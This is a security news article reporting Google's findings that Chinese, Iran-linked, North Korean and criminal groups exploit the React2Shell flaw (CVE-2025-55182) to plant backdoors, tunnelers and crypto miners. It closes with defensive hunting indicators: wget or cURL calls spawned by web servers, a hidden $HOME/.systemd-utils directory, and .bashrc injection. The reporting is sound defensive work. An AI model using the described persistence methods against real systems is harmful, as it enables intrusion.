China, Iran are having a field day with React2Shell, Google warns

Who hasn't exploited this max-severity flaw?

At least five more Chinese spy crews, Iran-linked goons, and financially motivated criminals are now attacking React2Shell, a maximum-severity flaw in the widely used React JavaScript library, according to Google.

Unauthenticated attackers can abuse the flaw, tracked as CVE-2025-55182, to remotely execute code, and the Chocolate Factory's threat hunters said multiple groups are using this vulnerability to deploy backdoors, tunnelers, and cryptocurrency miners.

React maintainers disclosed the critical bug on December 3, and exploitation began almost immediately. According to Amazon's threat intel team, Chinese government crews, including Earth Lamia and Jackpot Panda, started battering the security hole within hours of its disclosure. Palo Alto Networks' Unit 42 responders have put the victim count at more than 50 organizations across multiple sectors, with attackers from North Korea also abusing the flaw. 

Google, in a late Friday report, said at least five other suspected PRC spy groups also exploited React2Shell, along with criminals who deployed XMRig for illicit cryptocurrency mining, and "Iran-nexus actors," although the report doesn't provide any additional details about who the Iran-linked groups are and what they are doing after exploitation.

"GTIG has also observed numerous discussions regarding CVE-2025-55182 in underground forums, including threads in which threat actors have shared links to scanning tools, proof-of-concept (PoC) code, and their experiences using these tools," the researchers wrote.

The Beijing-backed suspected spy crews include UNC6600 exploiting the vulnerability to deliver the Minocat tunneler to establish persistence to infected systems, and UNC6586 with the Snowlight backdoor. In the case of UNC6586, Google's threat intel group spotted Snowlight making HTTP GET requests to command-and-control infrastructure to retrieve additional payloads masquerading as legitimate files.

Additionally, another Chinese espionage group Google tracks as UNC6588 exploited CVE-2025-55182 and then downloaded a Compood backdoor, while UNC6603 used the vuln to deploy an updated Hisonic backdoor. "Telemetry indicates this actor is targeting cloud infrastructure, specifically AWS and Alibaba Cloud instances, within the Asia Pacific (APAC) region," Google Threat Intelligence said.

Finally, China-nexus group UNC6595 is abusing the flaw to deploy Angryrebel.Linux, primarily targeting infrastructure hosted on international Virtual Private Servers (VPS).

In addition to the first React bug, CVE-2025-55182, three additional vulnerabilities were disclosed last week: CVE-2025-55183, CVE-2025-55184, and CVE-2025-67779. These allow attackers to force denial-of-service conditions and potentially leak Server Function source code.

To avoid worst-case scenarios from any of these four vulnerabilities, patch vulnerable React Server Components and monitor network traffic with an eye out for outbound connections to the indicators of compromise (IOCs) listed in Google's report, especially wget or cURL commands initiated by web server processes.

The Google threat intel team also recommends hunting for newly created hidden directories like $HOME/.systemd-utils, the unauthorized termination of processes including ntpclient, and the injection of malicious execution logic into shell configuration files like $HOME/.bashrc. ®